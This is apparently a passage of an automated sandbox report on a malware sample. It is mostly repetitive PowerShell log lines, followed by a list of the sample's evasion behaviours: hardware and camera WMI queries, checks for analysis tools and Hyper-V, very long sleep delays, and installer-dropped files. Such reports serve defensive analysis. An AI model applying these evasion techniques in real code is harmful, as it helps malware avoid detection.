Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
Source: regsvr32.exe, 00000009.00000003.101750988707.00000000050D4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101957876341.000000000522F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101942743810.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101951234755.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101935437421.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101954673010.000000000509C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101953465568.00000000050BA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101955689436.00000000050C7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101939285418.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101929916037.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDAG.EXE]
Source: regsvr32.exe, 00000009.00000003.101750988707.00000000050D4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101957876341.000000000522F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101942743810.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101951234755.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101935437421.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101954673010.000000000509C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101953465568.00000000050BA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101955689436.00000000050C7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101939285418.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101929916037.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDAQ.EXE/
Source: regsvr32.exe, 00000009.00000003.101750988707.00000000050D4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101957876341.000000000522F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101929916037.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101957639012.000000000522C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101751947983.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101930271118.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101887332084.00000000054A9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101888466858.00000000054AC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101888208763.00000000054A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXEQ5
Source: C:\Windows\System32\regsvr32.exeMemory allocated: 5C20000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\regsvr32.exeMemory allocated: 1DFE0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\regsvr32.exeWindow / User API: threadDelayed 9927Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9895Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9915Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9900
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TP7FD.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-N7DV6.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LKP6G.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\is-8SV5O.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LKP6G.tmp\_isetup\_shfoldr.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Swallow.dat (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TP7FD.tmp\_isetup\_shfoldr.dllJump to dropped file
Source: C:\Windows\System32\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-26632
Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.9 %
Source: C:\Windows\System32\regsvr32.exe TID: 1372Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep count: 9895 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4288Thread sleep count: 9915 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3484Thread sleep count: 9900 > 30
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070409Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04090409Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08090809Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070409Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04090409Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08090809Jump to behavior
Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9907A170 GetSystemInfo,14_2_00007FFB9907A170
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: regsvr32.exe, 00000009.00000003.101743560036.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101947276329.0000000005204000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056814035.00000000012F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service6
Source: regsvr32.exe, 0000000E.00000003.101835410052.0000000002FAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101847395804.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101840433580.0000000002FE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Sched
Source: regsvr32.exe, 0000000E.00000003.101841221752.0000000003088000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytesgga]
